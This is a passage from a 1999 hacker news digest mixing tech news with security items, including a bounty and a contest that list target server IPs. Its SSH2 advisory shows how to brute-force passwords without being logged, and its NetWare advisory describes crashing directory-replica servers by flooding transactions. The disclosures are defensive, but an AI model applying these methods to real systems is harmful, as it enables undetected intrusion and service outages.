bay. In the states, the problem seems to stem from the separation of states.. but if people start shelling out cash for virtual property, the likes of which cannot be seen right now, there will be a renewed effort by the USG to tax online transactions. Fourth: Hopefully this will lead to the apparition of "free" servers that will pop up and have much more room to grow, allowing people to settle in. It'd be even nicer if a "Homesteading" act were to be implemented on UO (specific example) to move over onto the new systems, giving them some sort of bonuses (very much like the development of the "Wild West in early America.) From Craig Wright: Interesting, But Shame On You! Virtual Property is an interesting issue but really is nothing new. Buying "space" from a isp for a large website has been around for years, paying someone else to build the website is comonplace, digitizing a photograph, and how about DOMAIN NAMES? - these are all forms of virtual property. Middle class americans have been paying cash for ownership of virtual materials for some time now. Focusing on some geeks who spend too much on UO characters on ebay and then implying from that fact the economy is undergoing a fundamental change is really quite silly. Put your technophile cheerleader pom poms down and do a little research willyah? Within the online gaming comunity there are other useful examples of virtual property such as Chron-X, Sanctum and other budding online games working on a far different paradigm than the "service" model of the "pay-as-you-play" games such as UO. C-X and Sanctum are wholly or partially based around the collectable card game paradigm introduced years ago by MAGIC: THE GATHERING. The interesting thing about the online versions (which have been around for at least three years or so) is that they are ENTIRELY virtual property. Unlike UO-type games where you have to buy the software and pay an ongoing service fee to keep playing. In these other games the only thing that one pays for is the virtual cards (software free, no fees except paying for more cards should you want them). As one might expect, trading, auctioning, and selling collections has been an integral part in the development of these games. I believe C-X at one time had over 70k accounts and may have plenty more now that they have moved to a Sony gaming site (I haven't played for nearly a year). As a matter of fact Genetic Anomalies, the company behind Chron-X, began as a company devising a method for protecting virtual property and developed with what they call Collectible Bits (back in 1996 I believe) and designed their the game primarily as a way to illustrate what their software product could do in terms of reducing stealing and hacking problems already the cause of so many problems in various online gaming communities. UO tangent: it is neither the first, best nor probably even the largest of its genre. The 150k players - that's BS, online games inflate their players by counting ACCOUNTS rather than active players, many players play for a while and then either reduce their playing time significantly or stop playing altogether - but their ACCOUNTS are still counted. This is especially problematic with UO as there are a half dozen or so games all currently in stiff competition for the same audience. By the way, UO is the only one of its genre in which its participants have attempted to bring a class action suit against the company because of their dissatisfaction with the game. The whole genre is unlikely to become a dominant faction within the online gaming community merely because it is so damn expensive to play. There have been dozens of experiments for specific subscription games or subscription gaming sites of several varieties and none have achieved more than moderate success. I read a few of the /. comments on your first piece and ran across thoughful responses that disagreed with you which also made interesting points -- yet in your article you quote a few imbicilic flames as representative of those who disagree and more thoughtful responses of those who agree. This is a rather cheap way to make your argument appear stronger - shame on you! (Note: I only quote from e-mail, since thoughtful (and non-thoughtful) disagreements are posted openly on Threads. And I didn¹t get many disagreements last week. I always reflect an accurate balance of criticism versus agreement ­ discussions where everybody agrees are sort of pointless, and, on the Net, impossible. As for nasty flames, they never bother me a bit ­ kind of like mosquitoes or peas off a tank. Knowledgeable or thoughtful criticism, on the other hand, terrifies me). @HWA 38.0 Aibo, Sony's new robotic dog, at $2500US a pop don't dump your furby just yet... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Sony's robotic dog: cute, but not cuddly By Stephanie Miles Staff Writer, CNET News.com May 11, 1999, 1:05 p.m. PT URL: http://www.news.com/News/Item/0,4,36375,00.html update Could Sony's new Aibo be a robotic--and canine--version of a Trojan horse, this time used to smuggle the electronic giant's new technology into homes around the world? Probably not, analysts say, but Aibo will bring robotics into the home, along with other new Sony technologies. Announced today, Aibo is an electronic pet capable of acting in response to external stimuli and communicating with its owner. Intended for entertainment purposes only, the introduction of the robotic dog contains shades of the company's previous entertainment product, the PlayStation. Once introduced as a pure gaming platform, the PlayStation now includes computing components such as DVD drives and Internet access. The introduction of the electronic pet is probably not a subversive method of ingratiating Sony technology into the American home, especially because Aibo is only projected to sell 2,000 units in the United States next year, according to Sean Kaldor, an analyst with International Data Corporation. "I don't think this is their vehicle to propagate technologies into the mass user scale," Kaldor said, noting that Aibo can only perform very limited functions and can't even fetch yet. Plus, he noted, the toy is priced around $2,000, which will probably discourage mainstream acceptance. "This isn't a stealth way to mass-introduce a product." But Aibo may be some Americans' first opportunity to play with Sony's Memory Stick, a portable, re-recordable storage media 1.5 inches long with the thickness of a piece of gum. Sony is selling an 8MB Memory Stick accessory that can store commands for Aibo. Aibo is also one of the first devices shipping running on Sony's Aperios real-time embedded operating system. Sony struck a deal with General Instrument last year, licensing the operating system for use in GI's set-top boxes. "There's a lot of operating systems out there, and this is Sony's proprietary operating system," explained Seamus McAteer, an analyst with Jupiter Communications, expressing doubts that Sony is attempting any significant attempt at marketing or promoting Aperios through Aibo. "You're not going to have a ton of developers developing a lot of applications to run on this device, so it doesn't buy you a whole lot," he said. "Whoever's going to buy this really doesn't care which real-time OS it is using. It's a design win, but not a big deal." Americans are not likely to shell out $2,000 for a programmable dog that does not yet fetch, but Aibo is likely to succeed in the Japanese market, which wholeheartedly embraced the Tamagotchi electronic toys, Kaldor said. "The Japanese perspective on technology is warm and fuzzy," he said. "Robots in Japan are seen as very compelling things, unlike in the U.S., where they seem cold and harsh." @HWA 39.0 IBM Breaks more records for higher density storage in hard disk units ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wednesday May 12 4:02 AM ET IBM Researchers Claim New Data Storage Record SAN JOSE, Calif. (Reuters) - International Business Machines Corp. (NYSE:IBM - news) said it plans to announce Wednesday that its researchers have set a new world record for high density data storage. The company said it has doubled its old record by packing data so tight that 20.3 billion bits can fit in a square inch of data storage -- pushing up against what many analysts believe to be the physical limits of such technology. At the new level of density, every square inch of disk space could hold 2.5 billion bytes -- equivalent to two TV-quality movies or the text of some 2,500 average-sized novels. Eight bits equal a byte. A byte can store about one character of text. The new disk drives are 3.5 times more dense than IBM's highest capacity product, a disk drive for portable computers capable of storing nearly 6 billion bits per inch of data. The new developments have been demonstrated only in IBM's research labs, the company noted. It could take two to three years before IBM is ready to incorporate the technology into commercial products from IBM, or in disk drives that IBM's technology manufacturing unit increasingly builds for other computer makers, it said. ``This laboratory demonstration is very good news for our customers and the data storage industry,'' said Robert Scranton, director of recording head technology at IBM's Almaden Research Center. ``It shows that disk-drive capacities will continue to increase well into the 21st Century,'' he said. The greater storage capacity could be used to boost the capabilities of portable electronics that use IBM's tiny 1-inch microdrive data storage disks or laptops using its 2.5-inch drives, the company said. The extra capacity can be used to store recorded music or data-intensive graphics or video that would be impractical using current technology. In addition, large corporations could use such ultra-high-capacity drives to store far more data in storage systems using the same floor space. ``The stability of the bits was especially encouraging,'' Scranton added, referring to possible fluctuations in storage media used in such systems when pushed to such extremes. ``To make smaller bits, we improve both the disk materials and the read-write components to ensure that the bits' magnetic orientations will not change by themselves, yet the user can still quickly and reliably erase and rewrite bits,'' he said. IBM, which is headquartered in Armonk, N.Y., invented computer hard disk technology in the 1950s and continues to be a leader in advancing the storage capacity of computers. The first technical details of the new storage system will be disclosed next week at the International Magnetics Conference (Intermag 99) in Kyongju, Korea. @HWA 40.0 Carmack offers a bounty on Quake server DoS's and bug reports ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ F I N G E R This finger is being tracked and served by The Stomping Grounds' Finger Tracker. If you are looking for more fingers, please visit Stomped or go directly to the Stomped Finger Tracker. [idsoftware.com] Name: John Carmack Email: johnc@idsoftware.com Description: Programmer Project: Quake 3 Arena ------------------------------------------------------------------------------- 5/11/99 ------- You can bias the level of detail lower than allowed in the menu with "r_lodbias 2", which will force all models to the lowest lod. The view weapon will look very ugly. Another little speedup option that isn't offered in the menus is: "cg_simpleitems 1" this removes the extra rings and spheres around some items. You can also turn off all the gibs with "cg_gibs 0". * clear game memory at init, which fixes the stuck-at-intermission problem on mac servers * fixed mismatched free / Z_Free in demo menu * removed unused reference to sprites/plama.md3 * automatically get sounds from model name * scale sensitivity by zoom * immediately archive changes to latched cvars * cheat protect r_portalonly * don't print "XXX connected" on level restarts * fixed "give item" on levels where 0,0,0 is in solid * fixed timedemo * don't play pain falling sound if dead * fixed falling damage sound not snd specific * fixed crashtest 2 * fixed crashtest 1 * q3map_backshader * q3map_globaltexture 5/11/99 ------- Do NOT send bug reports and game comments directly to me! If I have to filter through hundreds of emails a day, I won't get any more work done... Only crashtest related problems should come to me, everything else should go to q3feedback@idsoftware.com. 5/11/99 ------- Sami Tammilehto wins the second prize. Some large connectionless packets can cause crashes. This one was a result of me having the maximum token size defined lower than the maximum string size. 5/11/99 ------- BigImp wins the first prize. It doesn't crash the server, but fmtspec names will crash all clients that try to log on. Technically that would be an upkeep required DOS attack, but I'll let this one go. I even had a "FIXME: make vsprintf safe" comment by the offending line... I am going to update the server to filter out all % chars that come in over the net to prevent any other similar things. 5/11/99 ------- Everyone should realize that many popular net links are going to be clogged up with q3test downloads for a while, so net play may be a bit patchy to a lot of servers. ------------- Now that the first win32 test is out, here is The Plan for going forward: All future releases should be same-day for all architectures. There may be an exe-only update to the current distributions if there are significant problems, but it isn't scheduled. The next major test release will include a new one on one map designed for tournement play, and new executables with server and game modifications, but will not require downloading a new pak0.pk3. The release after that will introduce various teamplay rules on the original two maps. This version will likely be another full download, because I know that I still have a couple things to change in the map format. This will probably be the first test running with the virtual machine. The final major test release will introduce the single player game with bots and ranks. After any bugs are shaken out of that, it will be the "Q3 Demo" instead of the "Q3 Test", and we should be ready to release the full game to stores. In an ideal world, people that aren't prepared to deal with in-development software would wait until then to form an opinion of the product. --------------- ***** I am offering a bounty for server crashing bugs. Q2 had several releases forced out because of malicious attacks on all the public servers, so I want to try and flush out what I can during Q3's testing phase. There is a server running in the debugger here at crashtest.idsoftware.com (192.246.40.68). Anyone that can repeatably hang or crash this system can have a $100 prize and some misc bit of Q3A paraphenalia that I can dig up. Operating system level attacks don't count -- only things that I can actually fix or protect against in my code. Denial of service attacks don't count if they require upkeep, but if there is a fire-and-forget DOS attack, it will still count. Any actions you can perform with the released client are fair game. Crashing the client isn't good for a bounty, but I would still like to know about it. Custom attack programs are also fair game. These are actually what I am most concerned about -- malicious programs that goes through and crash all listed servers. Ideally, you would practice on a private server under your control and only hit crashtest when you think you can repeat it. If you find one, email me the instructions so I can reproduce it. Include "CRASHTEST" in the subject so I won't miss it. First come, first served, one bounty per bug. I will update crashtest with our internal builds, so it will certainly be possible that an attack on the released servers no longer functions on crashtest. All Content Copyright 1999 by Reliant Net Services Formatted for 800x600 Resolution in High Color Designed for Version 4.0 Browsers or Better T3 Bandwidth Provided by: Spacestar Communications @HWA 41.0 Hack into a webserver and win $10,000 ... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Break Into a Web Server win $10,000 contributed by szone You can win a measly $10,000 for penetration into web severs during tomorrows Hackers Zone competition organized in conjunction with Infosecurity Asia. This 'competition' of course is nothing more than an exploitation by the sponsors Conclave and Voltaire whose products will be 'tested'. The IP addresses of the boxes in question are 210.24.153.90 and 210.24.153.70.You need not be present to win. (I don't know about you but I have better things to do with my time than e advertising fodder for these companies. If they want a real world security assessment of their products let them pay for one.) Internet Wire http://www.internetwire.com/technews/tn/tn982682.htx Tech Web http://www.techweb.com/printableArticle?doc_id=TWB19990512S0029 Internet News http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html Nando Times http://www.internetnews.com/intl-news/article/0,1087,6_116851,00.html Asian Conference Hosts Hacking Contest By Malcolm Maclachlan, TechWeb May 12, 1999 (4:28 PM) URL: http://www.techweb.com/wire/story/TWB19990512S0029 A conference in Singapore is working to show the dangers of hacking, ironically, by holding a hacking contest with thousands of dollars in prizes. The international Hackers Zone competition, which started Wednesday, is offering $10,000 to the first person to successfully break into servers connected to the Web and running security products. One server is running security products from Voltaire Advanced Data Security, while the second server is running software from Conclave Integrated Security. Hosted by Infosecurity Asia '99, the computer-security conference that will be held in Singapore next month, is open to anyone in the world. In order to prove the success, hackers have to move a file onto the server, or modify the Web page hosted there, and then send an e-mail describing their action to an address set up at Yahoo. The conference has promised to keep the names of all contestants confidential. The sponsors of the contest sought to point out that they did not endorse hacking, the general term for breaking into computer networks. Some computer enthusiast prefer the term "cracker," using the term hacker instead to refer to any hard-core programmer. "We consider hacking a criminal offense prosecutable in many countries and we do not condone such actions," said George Kane, regional director of Conclave, in a statement. Dan Farmer, a well-known computer-security expert, said such contests are not what they're cracked up to be. "Organizations do this from time to time -- it's not unusual," Farmer said. "I view them as misguided and modestly dangerous publicity stunts." There are a number of problems with such contests, he said. For one thing, the computer set-ups rarely mimic the way a network would be forced to work in the real world. Thus, he said, some companies use such contest to tout the invincibility of their systems and say how they foiled the world's best crackers, even though the world's best hackers probably would not get involved in something like this. Companies also get free testing of their systems. For instance, they can get "attack signatures," digital fingerprints that show how people attack a certain system. These can be used later to help companies realize when they are being attacked in the future. Such signatures are hard to get in the real world. Furthermore, such security testing can be quite expensive. "10K is chump change in the corporate world," Farmer said. Farmer is the author of Security Administrator's Tool for Analyzing Networks, a Unix tool that systems administrators use to test for security breaches in networks. The program, known as SATAN, caused a stir when it came out in 1995, prompting Farmer to publish multiple documents through his website explaining the rationale behind the software. The difference, Farmer said, is that contests encourage a certain type of behavior. "They're sending a message that breaking into systems is OK, that they'll reward the best and brightest," Farmer said. @HWA 42.0 SSHD vulnerability discovered by JJF Hackers Team ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ SSH Hole contributed by Zhodiac The J.J.F. Hackers team has released a advisory that covers problems in SSHD2 (up to version 2.0.11). The vulnerability describes a way to brute force a login/password. J.J.F. Hackers Team http://www.jjf.org/advisory/SshdJJFen.txt - J.J.F. / Hackers Team - Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: 05/09/1999 Release: 05/14/1999 Author: Zhodiac URL: http://www.jjf.org Application: sshd2 up to 2.0.11 OS: Unix Risk: Risky :), long term could gain system access. -=-=-=-=-=-=-=-= Introduction -=-=-=-=-=-=-=-= In the default instalation of sshd2 (up to 2.0.11) there is an open way to bruteforce a login/password, without any kind of ip logging by the sshd. Version 2.0.12 and newers seems to be not vulnerable to this attack, because it logs the ip at connection time. -=-=-=-=-=-=-=-= Details -=-=-=-=-=-=-=-= When a ssh client connects to the daemon, it has a number (default is three) of attempts to guess the correct password before disconnecting. If we shutdown the connection before using up the number of attempts, the daemon will not log neither the connection, the password guesses nor the ip of the client. One cristal clear example: [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: Disconnected; authentication error. [zhodiac@piscis zhodiac]$ In /var/log/messages: May 9 12:42:53 piscis sshd2[1391]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1344', requested service 'ssh-connection')' Now we try the bug: [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: FATAL: Received signal 2. [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: FATAL: Received signal 2. [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: FATAL: Received signal 2. [zhodiac@piscis zhodiac]$ Those "FATAL: Received signal2." are the response of interrupting the program with a ^C. Lets see what syslog did: May 9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed. May 9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed. May 9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed. No ip, no password guesses attempts on the logs! So a bruteforce can be done without any kind of logging... Sorry script-kiddies, no program available! -=-=-=-=-=-=-=-= Quick Fix -=-=-=-=-=-=-=-= Edit the file sshd2_config (usually at /etc/ssh2), set the value of "PasswordGuesses" to 1. With this each time a password is tried it will log it in the following way: May 9 12:46:07 piscis sshd[1308]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1527', requested service 'ssh-connection')' It is also recommended to set the value of "ListenAddress" so we will have more control of which ips can use our ssh service. A better solution is to upgrade to 2.0.12 version or newer , with them at connection it will log via syslog in the following way: May 9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- zhodiac@jjf.org http://www.jjf.org - J.J.F. / Hackers Team - Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= @HWA 43.0 Neil Stephenson's new book "Cryptonomicon" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ‘Cryptonomicon’: Turning point for cult author Neal Stephenson embarks on multi-novel epic journey By Alan Boyle MSNBC May 12 The Hacker Hemingway looks the part: In his publicity photo, he strikes a cross-armed pose in goatee, close-cropped hair and shades. But Cryptonomicon author Neal Stephenson, a family man pushing 40 as well as a leading light in cyberpunk lit, jokes that his image could use an overhaul. I may have to lose the goatee, he says. ALONG WITH the comparisons to Ernest Hemingway and Thomas Pynchon, Stephenson has won praise for his fanciful visions of not-all-that-distant technological futures. In his 1992 novel Snow Crash, he depicted a virtual-reality realm called the Metaverse, which seemed to presage the rise of Internet culture. In 1995, Diamond Age blended neo-tribalism with nanotechnology and an almost Big Brotherly global communications network. All this has brought Stephenson a loyal following among computer adepts and led Newsweek to use the Hacker Hemingway tag. His book is on Amazon.com’s top-10 list. But during a book-tour interview, Stephenson confessed that he was sometimes uncomfortable with his hacker-cult status. I find that the standard attitude of young people now people in high school, in college, in their 20s is this image of hip, jaded, ultracool detachment, he said. I’ve noticed that there are a fair number of people like that who assume I’m one of them. I’m actually not. I actually find people like that kind of annoying. PAST AND PRESENT Cryptonomicon may mark a turning point for Stephenson. One of the things I developed a reputation for with the other books was speculating about future technologies, good or bad, he acknowledged. And readers who come to ‘Cryptonomicon’ looking for that kind of thing aren’t going to get it. Unlike the futuristic Snow Crash or Diamond Age,Stephenson’s latest work focuses on the past and a plausible present: the battles over secret codes in World War II, modern-day deals to create data havens and, of course, heroes who uncover a dark conspiracy that bridges the decades. It’s a cross between Raiders of the Lost Ark and The X-Files, weighing in at 918 pages. The length isn’t the only thing imposing about Cryptonomicon: The book’s huge cast includes historical figures such as code-breaking mathematician Alan Turing and Army Lt. Ronald Reagan. Characters expound upon the intricacies of high-tech business plans and Cap’n Crunch cereal. But most of all, the novel revolves around cryptography:keeping secrets and unlocking them. In fact, Cryptonomicon boasts a how-to appendix that, by some accounts, would violate encryption export laws if it were transmitted abroad electronically. The appendix on the Solitaire encryption algorithm, which uses a deck of cards rather than a computer to encode secret messages, was written by Bruce Schneier, author of Applied Cryptography. Stephenson himself is well-versed in the mysteries of software code but doesn’t profess to be a crypto expert. I tried to keep it real as much as I could, Stephenson said. There are places where the book deviates somewhat from complete technical accuracy. I actually posted a little FAQ document specifically aimed at people who know about crypto, because I know people who know crypto are going to see some things that I glossed over. DEALING WITH CELEBRITY Over the years, Stephenson has dealt with more than one bout with cyber-lebrity, and he says his experience is serving him in good stead this time around. He’s avoiding broadcast interviews on this tour, since he says all of my most horrifying experiences on the last tour were trying to explain my book on television. He also manages to keep his public life separate from his private life. He quickly declines to discuss the effect of cyclical fame on his family in Seattle, and he’s reluctant to talk about the grander meanings behind his writing. If I try to stand outside of it and encapsulate my own themes, it would ruin it for me because I would be way too self-conscious, and it would ruin it for readers, too, he said. All in all, he sounds as if he’s anxious for the book tour’s end, so he can get back to work. I have to have a lot of privacy, a lot of quiet, a minimum of distractions to do what I do, he said. When it’s over, it’s really over. As soon as I finish this thing, I go into a total media blackout for years. As fat as Cryptonomicon is, Stephenson still had to leave out some of the plot threads he was hoping to follow and he says those tales will be told in his next novel, a sequel of sorts. The funny thing about writing books is that the stuff that’s out where people can see it is a year or two behind the stuff that you’re doing at the moment, he said. And if things are going right, the stuff you’re doing at the moment seems a lot better. That’s one of the ways of trying to avoid getting a swelled head. @HWA 44.0 Novell Netware 4.0 advisory by Nomad Mobile Research Center ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Novell Netware 4.x Vulnerable contributed by Simple Nomad The Nomad Mobile Research Center has released an advisory that says that under certain conditions, Novell Netware 4.x is vulnerable to a denial of service that can crash multiple servers. According to Novell, the latest Service Pack will correct the problem. The Nomad Mobile Research Center http://www.nmrc.org/news/tts.txt _______________________________________________________________________________ Nomad Mobile Research Centre A D V I S O R Y www.nmrc.org Simple Nomad [thegnome@nmrc.org] 12May1998 _______________________________________________________________________________ Platform : Netware 4.x Application : NDS Severity : High Synopsis -------- It is possible to overflow the Transaction Tracking System (TTS) built into Novell Netware and possibly crash multiple servers. Tested configuration -------------------- The testing was done with the following configuration: Netware 4.11, Service Pack 5B Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space. Bug(s) report ------------- The Transaction Tracking System (TTS) is used by Novell Netware to help preserve the integrity of data during a system crash. If a transaction is in the process of being written to the hard drive when the system crashes, upon reboot the partial transaction is backed out preserving the integrity of the original data. Administrators can optionally flag a file with the TTS flag to add this protection (typically done with databases, especially those that have no rollback features). TTS by default tracks 10,000 transactions, and each instance uses a small amount of memory. If a burst of transactions are sent to the server and the available memory is exhausted, TTS will disable. While TTS is disabled, no updates can be made to Netware Directory Services. This can impact any program or process that updates NDS, such as login. In extreme overrun cases, such as very large simultaneous (or near simultaneous, actually) transactions, memory will be depleted quick enough to crash the server. This is not entirely uncommon, as any large burst of traffic updating NDS will cause the problem, such as bringing up a server after several days of downtime that has a Directory Services replica on it. Normally this can be corrected by increasing RAM or lowering the amount of transactions tracked from the maximum default of 10,000 down to say 5,000 by issuing the command SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling TTS by typing ENABLE TTS at the console. However, a malicious user with proper access can force the memory depletion and potentially crash a server that has a replica of the NDS database. This can lead to multiple near-simultaneous server crashes. Of course anyone with administrative access can do this, but they could obviously do other acts that could be just as destructive, if not more so. What is needed is the ability to create a large number of NDS updates very quickly. For example, if a user has the ability to create a container and add objects to it, them that user has enough authority to potentially cause problems to TTS. Creating a container, dropping a few hundred objects into the container via drag-and-drop and then deleting the container should suffice. If the server lacks a large amount of free memory, the server will quite possibly abend. In other cases, TTS is disabled, which is a form of Denial of Service. As the messages are sent across to other servers containing NDS replicas, they too may crash. In our test environment we were able to crash two servers (Netware 4.1 and Netware 4.11) with a the scenario of creating a container, adding a few hundred users, and then deleting the container. Solution/Workaround ------------------- NMRC has heard reports of as many as a dozen servers crashing within a couple of minutes of each other, so apply the latest Service Pack for Netware 4.x on all servers or upgrade to Netware 5. Comments -------- Novell has already been notified and they are obviously aware of the TTS limitations (refer to the May 1997 TID 2908153 at http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example). Per Novell the latest patches for Netware 4.x correct the problem, and Netware 5 does not have the problem at all. Thanks to Michel Labelle for notifying NMRC about this problem. _______________________________________________________________________________ @HWA 45.0 Penalties for Pirates may increase ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Penalties for Pirates May Increase contributed by 1Di3h A hearing of the House Judiciary Committee heard testimony from the FBI , The Department of Justice, and numerous software companies supporting proposed legislation that would toughen the penalties for makers and distributor of illegal copies of software. Wired http://www.wired.com/news/news/politics/story/19659.html Stiffer Fines Due for Pirates? by Heidi Kriz 3:00 a.m. 13.May.99.PDT One out of four business software applications is pirated. So testified Tim Starback, director of marketing for digital font maker Emigre, at a Wednesday hearing of the House Judiciary Committee that addressed digital copyright violations. The company joined other software publishers, as well as the FBI and the Department of Justice, in supporting proposed legislation that would toughen the penalties for makers and distributors of illegal copies of software. "It's time for Congress to make the pirates pay," said Ken Wasch, president of the Software & Information Industry Association (SIAA). Wednesday's testimony to the Subcommittee on Courts and Intellectual Property sought to advance two agenda items. Industry reps praised proposed amendments to the current Copyright Act, introduced yesterday by Representative James Rogan (R-California) and Representative Howard Coble (R-North Carolina). They also sought to hurry along implementation of the Clinton administration's 1997 No Electronic Theft Act (NET). The latter legislation is managed by a sentencing commission, but no commissioners have been appointed to staff it. The proposed amendments, known as the Copyright Damages Improvement Act of 1999, seek to increase fines in the cases of copyright violations. The current range of statutory damages, which date to 1988, vary from US$500 to $20,000, according to Dan Duncan, vice president of government affairs for the SIIA. Tuesday's legislative amendments propose increasing that penalty to between $750 and $30,000 -- a figure the industry group said is based on actual damages and lost profits. In cases of willful infringement, the new ceiling of damages would be raised from its current level of $100,000 to $150,000. Witnesses sought to persuade Congress to clarify sentencing guidelines for criminal copyright infringements under the NET Act. Should the legislation pass a subcommittee vote, it will then move on to a vote in the House Judiciary Committee, and then to a House vote.Duncan said that House members had expressed a desire to vote on the amendments before the upcoming congressional recess, which starts after Memorial Day. Not everyone is raving about the proposed stiffer penalties. An MIT computer-science student who goes by the name Phat Boy said that the fines would punish those who simply share unlicensed software over the Net as much as those who seek to sell it. Phat Boy cited the case of "LaMacchia," a fellow MIT student who in 1994 was fingered by authorities for posting licensed programs on the Net. Under the new rules, he would be fined hundreds of thousands of dollars, according to Phat Boy. "Why should that kind of act -- maybe ill-advised, but certainly perpetrated in the generous, shareware spirit -- be punished with the same ferocity as a corporate pirateer [would be]?" said Phat Boy. @HWA 46.0 British Spy's site shutdown on Geocities? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.403-security.org/ Spy 's site shut down Astral 13.05.1999 12:00 The free webhosting service GeoCities has shut down a former British spy's site becuase he was threating that he will put global illegal acts by British intelligence.The site was taken down at the end of April.What secrets were he about to reveal.Story from ZDnet. GeoCities Downs Spy Site The free webhosting service GeoCities has shut down a former British spy's site. What secrets was he about to reveal? How far can the influence of British intelligence reach? Today it reached half way around the world to shut down a California-based website that allegedly revealed the identities of Her Majesty's secret agents. Richard Tomlinson used to be an agent for the British government. Ousted in 1995, Tomlinson was then imprisoned in 1997 for violating a British official secrets act. After his release, he reportedly ended up in Switzerland, where he started a website claiming global illegal acts by British intelligence. The site was taken down at the end of April; Swiss authorities say Tomlinson had threatened to publish British secrets online, and they had to shut him down to prevent that. Last week, Tomlinson put up a new site through the free Web-hosting service GeoCities. This time, he allegedly said he was going to release sensitive details about where British intelligence offices are located. That new site has now been suspended. Bruce Zanca, the vice president of communications at GeoCities, says that it was simply a matter of policy. "People [complete] a questionnaire and agree to no illegal activities and no hate speech. It was brought to our attention that there were content violations; we put the site under suspension." He added, "We're careful in protecting privacy for our users, so I can't get into details, but it fell under the general content restrictions." Next steps? "[Tomlinson] is free to [dispute the shut down] and if so, we'll start a dialog with him. If the site is brought into compliance, we'll put the website back up." Sunday Times; (UK) May 13 1999 BRITAIN Government fears that rogue website might put lives at risk, writes Michael Evans MI6 agent list published on the Internet URGENT legal moves were ordered yesterday after an American website published the names of a "large number" of serving MI6 intelligence officers. Ministry of Defence officials learnt of the new Internet website yesterday morning and immediately contacted Rear Admiral David Pulvercraft, Secretary of the Defence, Press and Broadcasting Advisory Committee - the D Notice Committee - to try to prevent publication of any of the names by the British media. The list of MI6 names and other details about the intelligence service were regarded as a serious security breach. Admiral Pulvercraft, who has no powers to stop newspapers publishing sensitive material, advised that publication of such details could "put lives at risk". He said that there was concern that the "long list" may have been put on the Internet by a former member of the Secret Intelligence Service. Last week the Government took out a court injunction in Switzerland against Richard Tomlinson, the former MI6 officer who was sacked from the service and was subsequently sentenced to 12 months in prison for breaching the Official Secrets Act. The injunction prevented Mr Tomlinson, who now lives in Geneva, from disclosing any information about his past employment by MI6. The injunction covered disclosure anywhere in the world and included information put on the Internet. The American website makes no mention of Mr Tomlinson, and there is no evidence that he set it up himself. However, it was clear to Government lawyers that information on the website had come from Mr Tomlinson. The website refers to a disaffected MI6 officer. John Wadham, his lawyer, said that he had threatened to put such information on the Internet. He said Mr Tomlinson felt he had been "harassed around the world", and this was why he may have decided to take such action. Mr Tomlinson has also indicated that he still hoped to publish a book. It was his attempt to sell his MI6 memoirs to an Australian publisher that led to his arrest and trial at the Old Bailey. He pleaded guilty to breaching the Official Secrets Act and was released from jail in April last year. Although the Chief of the Secret Intelligence Service, known as "C", currently Richard Dearlove, is formally named by the Government on his appointment, no other members of the service are ever officially identified. Under Defence Advisory Notice No 6, editors of newspapers are asked to seek advice from the D Notice Secretary before publishing such details "unless they have been widely disclosed or discussed". Admiral Pulvercraft made clear yesterday that the identities of so many MI6 officers had not been previously disclosed, and he asked that the address of the website should not be published. Steps were being taken to see how the damage arising from the disclosure of the MI6 names could be minimised. Admiral Pulvercraft had to decide whether to make an issue of the case, knowing that by doing so he was drawing attention to the fact that a website had been set up. He said yesterday that even if the website was only short-lived, he felt it was necessary to put out an advisory notice. @HWA 47.0 The Virus Hype, Fact or Fiction by Thejian ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ THE VIRUS HYPE: FACT OR FICTION? by BHZ, Thursday 13th May 1999 on 9:48 pm CET Viruses are common threats to all computer users. From exe infectors to new-age Macro viruses. Our new special report goes deeper into viruses. You could read about "White Hats" and "Black Hats", media hype, myths and of course sollutions. So if you are interested read new Special Report. The Virus-hype: Fact or fiction? By now we've probably all heard of the term "computer virus". After all the panic first caused by Melissa and followed up by the CIH 1.2 Chernobyl-virus the mainstream computer-users now know (if they didn't know that already) one of the threats of the "Information Age" by name. It's nice that we all can copy and download programs and files from the internet and from each others system, but there are certain safety risks involved here. They have always been there btw, we just needed a little push to get the media coverage going. But how bad is it really? Every major online news service (and a lot of their printed collegues too) have reported about the menace the computer virus presents and they did a good job scaring the crap out of the clueless regular computer users, but how much of these stories is really true? And what is yet to come? Let's get something straight first: the first goal of most newspapers and online news services IS profit. They just 